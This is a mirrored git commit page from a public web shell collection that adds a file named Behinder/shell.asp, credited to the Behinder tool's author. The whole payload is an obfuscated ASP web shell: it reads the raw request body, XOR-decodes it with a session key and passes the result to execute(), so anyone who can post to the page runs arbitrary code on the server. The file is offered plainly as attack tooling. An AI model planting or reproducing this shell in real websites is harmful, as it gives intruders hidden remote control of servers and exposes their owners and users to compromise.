mirror of
https://github.com/tennc/webshell
synced 2024-11-22 03:03:03 +00:00
add shell.asp with Behinder
from : https://github.com/rebeyond/Behinder author: rebeyond 👍
This commit is contained in:
parent
088645f1c2
commit
05e2ea5d89
1 changed files with 11 additions and 0 deletions
11
Behinder/shell.asp
Normal file
11
Behinder/shell.asp
Normal file
|
@ -0,0 +1,11 @@
|
|||
<%
|
||||
Response.CharSet = "UTF-8"
|
||||
Session("k")=k
|
||||
k=Session("k")
|
||||
size=Request.TotalBytes
|
||||
content=Request.BinaryRead(size)
|
||||
For i=1 To size
|
||||
result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
|
||||
Next
|
||||
execute(result)
|
||||
%>
|
Loading…
Reference in a new issue